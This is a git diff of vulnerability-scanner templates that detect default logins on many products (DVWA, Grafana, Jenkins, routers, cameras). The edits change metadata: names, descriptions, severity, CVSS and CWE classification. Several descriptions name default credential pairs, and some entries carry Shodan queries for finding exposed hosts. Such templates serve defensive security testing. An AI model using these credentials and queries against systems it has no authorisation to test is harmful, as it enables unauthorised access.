@ -37,3 +40,5 @@ requests:
      - type: regex
        regex:
          - "^success$"
 # Enhanced by mp on 2022/03/03
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@ -1,9 +1,15 @@
 id: dvwa-default-login
 info:
  name: DVWA Default Login
  author: pdteam
  severity: critical
  description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
  tags: dvwa,default-login
  reference:
    - https://opensourcelibs.com/lib/dvwa
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
@ -50,3 +56,5 @@ requests:
      - type: word
        words:
          - "You have logged in as 'admin'"
 # Enhanced by mp on 2022/03/03
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
@ -4,8 +4,11 @@ info:
  name: ExacqVision Default Login
  author: ELSFA7110
  severity: high
  description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
  tags: exacqvision,default-login
  reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
  classification:
    cwe-id: cwe-798
 requests:
  - raw:
@ -41,3 +44,5 @@ requests:
        words:
          - '"auth":'
          - '"success": true'
 # Enhanced by mp on 2022/03/03
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@ -4,7 +4,12 @@ info:
  name: Flir Default Login
  author: pikpikcu
  severity: medium
  description: Flir default login credentials (admin/admin) were discovered.
  reference:
    - https://securitycamcenter.com/flir-default-password/
  tags: default-login,flir,camera,iot
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
@ -41,3 +46,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/03
--- a/default-logins/frps/frp-default-login.yaml
+++ b/default-logins/frps/frp-default-login.yaml
@ -1,11 +1,14 @@
 id: frp-default-login
 info:
-  name: Frp Default Login
+  name: FRP Default Login
  author: pikpikcu
  severity: high
  description: FRP default login credentials were discovered.
  tags: frp,default-login
  reference: https://github.com/fatedier/frp/issues/1840
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
@ -33,3 +36,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/03
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@ -1,15 +1,18 @@
 id: gitlab-weak-login
 info:
-  name: Gitlab Weak Login
+  name: Gitlab Default Login
  author: Suman_Kar,dwisiswant0
  severity: high
  description: Gitlab default login credentials were discovered.
  tags: gitlab,default-login
  reference:
    - https://twitter.com/0xmahmoudJo0/status/1467394090685943809
    - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
  metadata:
    shodan-query: http.title:"GitLab"
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
@ -51,3 +54,5 @@ requests:
          - '"token_type":'
          - '"refresh_token":'
        condition: and
 # Enhanced by mp on 2022/03/03
--- a/default-logins/glpi/glpi-default-login.yaml
+++ b/default-logins/glpi/glpi-default-login.yaml
@ -5,8 +5,10 @@ info:
  author: andysvints
  severity: high
  tags: glpi,default-login
-  description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
+  description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
  reference: https://glpi-project.org/
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
@ -65,3 +67,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/03
--- a/default-logins/google/google-earth-dlogin.yaml
+++ b/default-logins/google/google-earth-dlogin.yaml
@ -4,10 +4,21 @@ info:
  name: Google Earth Enterprise Default Login
  author: orpheus,johnjhacking
  severity: high
-  tags: default-login,google
+  description: Google Earth Enterprise default login credentials were discovered.
-  reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
+  remediation: "To reset the username and password:
 sudo /opt/google/gehttpd/bin/htpasswd -c
 /opt/google/gehttpd/conf.d/.htpasswd geapacheuse"
  tags: default-login,google-earth
  reference:
    - https://johnjhacking.com/blog/gee-exploitation/
    - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
  metadata:
    shodan-query: 'title:"GEE Server"'
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -35,3 +46,5 @@ requests:
        words:
          - 'DashboardPanel'
          - 'Earth Enterprise Server'
 # Enhanced by mp on 2022/03/10
--- a/default-logins/gophish/gophish-default-login.yaml
+++ b/default-logins/gophish/gophish-default-login.yaml
@ -1,10 +1,18 @@
 id: gophish-default-login
 info:
-  name: Gophish < v0.10.1 default credentials
+  name: Gophish < v0.10.1 Default Credentials
  author: arcc,dhiyaneshDK
  severity: high
  tags: gophish,default-login
  description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary.
  reference:
    - https://docs.getgophish.com/user-guide/getting-started
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -44,3 +52,5 @@ requests:
          - "contains(tolower(all_headers), 'gophish')"
          - "status_code==302"
        condition: and
 # Enhanced by mp on 2022/03/10
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@ -5,10 +5,16 @@ info:
  author: pdteam
  severity: high
  tags: grafana,default-login
  description: Grafana default admin login credentials were detected.
  reference:
    - https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
    - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
    - https://github.com/grafana/grafana/issues/14755
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -46,3 +52,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/guacamole/guacamole-default-login.yaml
+++ b/default-logins/guacamole/guacamole-default-login.yaml
@ -5,7 +5,13 @@ info:
  author: r3dg33k
  severity: high
  tags: guacamole,default-login
-  reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22.
+  description: Guacamole default admin login credentials were detected.
  reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -42,3 +48,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/hongdian/hongdian-default-login.yaml
+++ b/default-logins/hongdian/hongdian-default-login.yaml
@ -4,7 +4,15 @@ info:
  name: Hongdian Default Login
  author: gy741
  severity: high
  description: Hongdian default login information was detected.
  tags: hongdian,default-login
  reference:
    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -46,3 +54,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/hortonworks/smartsense-default-login.yaml
+++ b/default-logins/hortonworks/smartsense-default-login.yaml
@ -4,9 +4,14 @@ info:
  name: HortonWorks SmartSense Default Login
  author: Techryptic (@Tech)
  severity: high
-  description: Default Login of admin:admin on HortonWorks SmartSense application.
+  description: HortonWorks SmartSense default admin login information was detected.
  reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
  tags: hortonworks,smartsense,default-login
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -36,3 +41,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/hp/hp-switch-default-login.yaml
+++ b/default-logins/hp/hp-switch-default-login.yaml
@ -1,12 +1,18 @@
 id: hp-switch-default-login
 info:
-  name: HP 1820-8G Switch J9979A Default Credential
+  name: HP 1820-8G Switch J9979A Default Login
  author: pussycat0x
  severity: high
  description: HP 1820-8G Switch J9979A default admin login credentials were discovered.
  reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
  metadata:
    fofa-query: 'HP 1820-8G Switch J9979A'
  tags: default-login,hp
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -31,3 +37,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/huawei/huawei-HG532e-default-router-login.yaml
+++ b/default-logins/huawei/huawei-HG532e-default-router-login.yaml
@ -1,11 +1,18 @@
 id: huawei-HG532e-default-login
 info:
  name: Huawei HG532e Default Credential
  description: Huawei HG532e default admin credentials were discovered.
  author: pussycat0x
  severity: high
  metadata:
    shodan-query: http.html:"HG532e"
  tags: default-login,huawei
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -32,3 +39,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/ibm/ibm-mqseries-default-login.yaml
+++ b/default-logins/ibm/ibm-mqseries-default-login.yaml
@ -1,14 +1,19 @@
 id: ibm-mqseries-default-login
 info:
-  name: IBM MQSeries web console default login
+  name: IBM MQSeries Web Console Default Login
  author: righettod
  severity: high
-  description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
+  description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
  tags: ibm,default-login
  reference:
    - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd
    - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -42,3 +47,5 @@ requests:
      - type: status
        status:
          - 302
 # Enhanced by mp on 2022/03/10
--- a/default-logins/ibm/ibm-storage-default-credential.yaml
+++ b/default-logins/ibm/ibm-storage-default-credential.yaml
@ -3,8 +3,16 @@ id: ibm-storage-default-login
 info:
  name: IBM Storage Management Default Login
  author: madrobot
-  severity: medium
+  severity: high
  tags: default-login,ibm,storage
  description: IBM Storage Management default admin login credentials were discovered.
  reference:
    - https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -40,3 +48,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml
+++ b/default-logins/idemia/idemia-biometrics-default-login.yaml
@ -3,10 +3,15 @@ id: idemia-biometrics-default-login
 info:
  name: IDEMIA BIOMetrics Default Login
  author: Techryptic (@Tech)
-  severity: high
+  severity: medium
-  description: Default Login of password=12345 on IDEMIA BIOMetrics application.
+  description: IDEMIA BIOMetrics application  default login credentials were discovered.
  reference: https://www.google.com/search?q=idemia+password%3D+"12345"
  tags: idemia,biometrics,default-login
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -37,3 +42,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/iptime/iptime-default-login.yaml
+++ b/default-logins/iptime/iptime-default-login.yaml
@ -4,7 +4,15 @@ info:
  name: ipTIME Default Login
  author: gy741
  severity: high
  description: ipTIME default admin credentials were discovered.
  tags: iptime,default-login
  reference:
    - https://www.freewebtools.com/IPTIME/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -35,3 +43,5 @@ requests:
          - "login.cgi"
        part: body
        condition: and
 # Enhanced by mp on 2022/03/10
--- a/default-logins/jboss/jmx-default-login.yaml
+++ b/default-logins/jboss/jmx-default-login.yaml
@ -1,10 +1,18 @@
 id: jmx-default-login
 info:
-  name: JBoss JMX Console Weak Credential
+  name: JBoss JMX Console Weak Credential Discovery
  description: JBoss JMX Console default login information was discovered.
  author: paradessia
  severity: high
  tags: jboss,jmx,default-login
  reference:
    - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -36,3 +44,5 @@ requests:
      - type: word
        words:
          - 'JMImplementation'
 # Enhanced by mp on 2022/03/10
--- a/default-logins/jenkins/jenkins-default.yaml
+++ b/default-logins/jenkins/jenkins-default.yaml
@ -1,10 +1,16 @@
 id: jenkins-weak-password
 info:
-  name: Jenkins Weak Password
+  name: Jenkins Default Login
  author: Zandros0
  severity: high
  tags: jenkins,default-login
  description: Jenkins default admin login information was discovered.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -49,3 +55,5 @@ requests:
        dsl:
          - 'contains(body_3, "/logout")'
          - 'contains(body_3, "Dashboard [Jenkins]")'
 # Enhanced by mp on 2022/03/10
--- a/default-logins/kafka-center-default-login.yaml
+++ b/default-logins/kafka-center-default-login.yaml
@ -1,12 +1,20 @@
 id: kafka-center-default-login
 info:
-  name: Kafka Center Default Login
+  name: Apache Kafka Center Default Login
  author: dhiyaneshDK
  severity: high
  tags: kafka,default-login
  description: Apache Kafka Center default admin credentials were discovered.
  reference:
    - https://developer.ibm.com/tutorials/kafka-authn-authz/
  metadata:
    shodan-query: http.title:"Kafka Center"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -36,3 +44,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/minio/minio-default-login.yaml
+++ b/default-logins/minio/minio-default-login.yaml
@ -5,6 +5,14 @@ info:
  author: pikpikcu
  severity: medium
  tags: default-login,minio
  description: Minio default admin credentials were discovered.
  reference:
    - https://docs.min.io/docs/minio-quickstart-guide.html#
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -40,3 +48,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/mofi/mofi4500-default-login.yaml
+++ b/default-logins/mofi/mofi4500-default-login.yaml
@ -3,8 +3,16 @@ id: mofi4500-default-login
 info:
  name: MOFI4500-4GXeLTE-V2 Default Login
  author: pikpikcu
-  severity: critical
+  severity: high
  tags: mofi,default-login
  description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered.
  reference:
    - https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -31,3 +39,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/nagios/nagios-default-login.yaml
+++ b/default-logins/nagios/nagios-default-login.yaml
@ -1,10 +1,18 @@
 id: nagios-default-login
 info:
  name: Nagios Default Login
  author: iamthefrogy
  description: Nagios default admin credentials were discovered.
  severity: high
  tags: nagios,default-login
  reference: https://www.nagios.org
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
      - |
@ -32,3 +40,5 @@ requests:
          - 'Current Status'
          - 'Reports'
        condition: and
 # Enhanced by mp on 2022/03/10
--- a/default-logins/netsus/netsus-default-login.yaml
+++ b/default-logins/netsus/netsus-default-login.yaml
@ -4,9 +4,15 @@ info:
  name: NetSUS Server Default Login
  author: princechaddha
  severity: high
  description: NetSUS Server default admin credentials were discovered.
  metadata:
    shodan-query: 'http.title:"NetSUS Server Login"'
  tags: netsus,default-login
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -35,3 +41,5 @@ requests:
      - type: status
        status:
          - 302
 # Enhanced by mp on 2022/03/10
--- a/default-logins/nexus/nexus-default-login.yaml
+++ b/default-logins/nexus/nexus-default-login.yaml
@ -3,8 +3,14 @@ id: nexus-default-login
 info:
  name: Nexus Default Login
  author: pikpikcu
  description: Nexus default admin credentials were discovered.
  severity: high
  tags: nexus,default-login
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -34,3 +40,5 @@ requests:
          - "NXSESSIONID"
        part: header
        condition: and
 # Enhanced by mp on 2022/03/10
--- a/default-logins/nps/nps-default-login.yaml
+++ b/default-logins/nps/nps-default-login.yaml
@ -4,7 +4,15 @@ info:
  name: NPS Default Login
  author: pikpikcu
  severity: high
  description: NPS default admin credentials were discovered.
  tags: nps,default-login
  reference:
    - https://docs.microfocus.com/NNMi/10.30/Content/Administer/Hardening/confCC2b_pwd.htm
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -39,3 +47,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/ofbiz/ofbiz-default-login.yaml
+++ b/default-logins/ofbiz/ofbiz-default-login.yaml
@ -3,8 +3,16 @@ id: ofbiz-default-login
 info:
  name: Apache OfBiz Default Login
  author: pdteam
  description: Apache OfBiz default admin credentials were discovered.
  severity: medium
  tags: ofbiz,default-login,apache
  reference:
    - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -28,3 +36,5 @@ requests:
          - "ofbiz-pagination-template"
          - "<span>Powered by OFBiz</span>"
        condition: and
 # Enhanced by mp on 2022/03/10
--- a/default-logins/oracle/businessintelligence-default-login.yaml
+++ b/default-logins/oracle/businessintelligence-default-login.yaml
@ -3,8 +3,16 @@ id: oracle-business-intelligence-login
 info:
  name: Oracle Business Intelligence Default Login
  author: milo2012
  description: Oracle Business Intelligence default admin credentials were discovered.
  severity: high
  tags: oracle,default-login
  reference:
    - https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -43,3 +51,5 @@ requests:
        words:
          - 'createSessionReturn'
        part: body
 # Enhanced by mp on 2022/03/10
--- a/default-logins/paloalto/panos-default-login.yaml
+++ b/default-logins/paloalto/panos-default-login.yaml
@ -4,9 +4,15 @@ info:
  name: Palo Alto Networks PAN-OS Default Login
  author: Techryptic (@Tech)
  severity: high
-  description: Default Login of admin:admin on Palo Alto Networks PAN-OS application.
+  description: Palo Alto Networks PAN-OS application default admin credentials were discovered.
-  reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
+  reference:
    - https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
  tags: panos,default-login
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -38,3 +44,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/panabit/panabit-default-login.yaml
+++ b/default-logins/panabit/panabit-default-login.yaml
@ -4,8 +4,16 @@ info:
  name: Panabit Gateway Default Login
  author: pikpikcu
  severity: high
-  reference: https://max.book118.com/html/2017/0623/117514590.shtm
+  description: Panabit Gateway default credentials were discovered.
  tags: panabit,default-login
  reference:
    - https://max.book118.com/html/2017/0623/117514590.shtm
    - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -47,3 +55,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/pentaho/pentaho-default-login.yaml
+++ b/default-logins/pentaho/pentaho-default-login.yaml
@ -3,10 +3,18 @@ id: pentaho-default-login
 info:
  name: Pentaho Default Login
  author: pussycat0x
  description: Pentaho default admin credentials were discovered.
  severity: high
  metadata:
    shodan-query: pentaho
  tags: pentaho,default-login
  reference:
    - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -36,3 +44,5 @@ requests:
      - type: status
        status:
          - 302
 # Enhanced by mp on 2022/03/10
--- a/default-logins/rabbitmq/rabbitmq-default-login.yaml
+++ b/default-logins/rabbitmq/rabbitmq-default-login.yaml
@ -1,10 +1,18 @@
 id: rabbitmq-default-login
 info:
-  name: RabbitMQ admin Default Login
+  name: RabbitMQ Default Login
  author: fyoorer,dwisiswant0
  severity: high
  description: RabbitMQ default admin credentials were discovered.
  tags: rabbitmq,default-login
  reference:
    - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -34,3 +42,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/10
--- a/default-logins/rancher/rancher-default-login.yaml
+++ b/default-logins/rancher/rancher-default-login.yaml
@ -4,9 +4,16 @@ info:
  name: Rancher Default Login
  author: princechaddha
  severity: high
-  description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
+  description: Rancher default admin credentials were discovered. Rancher is an open-source multi-cluster orchestration platform that lets operations teams deploy, manage and secure enterprise Kubernetes.
-  reference: https://github.com/rancher/rancher
+  reference:
    - https://github.com/rancher/rancher
    - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/
  tags: default-login,rancher,kubernetes,devops,cloud
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -50,3 +57,5 @@ requests:
        part: header
        regex:
          - 'Set-Cookie: CSRF=([a-z0-9]+)'
 # Enhanced by mp on 2022/03/11
--- a/default-logins/ricoh/ricoh-weak-password.yaml
+++ b/default-logins/ricoh/ricoh-weak-password.yaml
@ -1,11 +1,18 @@
-id: ricoh-weak-password
+id: ricoh-default-login
 info:
-  name: Ricoh Weak Password
+  name: Ricoh Default Login
  author: gy741
  severity: high
  tags: ricoh,default-login
-  reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
+  description: Ricoh default admin credentials were discovered.
  reference:
    - https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -31,3 +38,5 @@ requests:
      - type: status
        status:
          - 302
 # Enhanced by mp on 2022/03/11
--- a/default-logins/rockmongo/rockmongo-default-login.yaml
+++ b/default-logins/rockmongo/rockmongo-default-login.yaml
@ -4,7 +4,15 @@ info:
  name: Rockmongo Default Login
  author: pikpikcu
  severity: high
  description: Rockmongo default admin credentials were discovered.
  tags: rockmongo,default-login
  reference:
    - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id:
    cwe-id: CWE-522
 requests:
  - raw:
@ -35,3 +43,5 @@ requests:
      - type: status
        status:
          - 302
 # Enhanced by mp on 2022/03/11
--- a/Show More
+++ b/Show More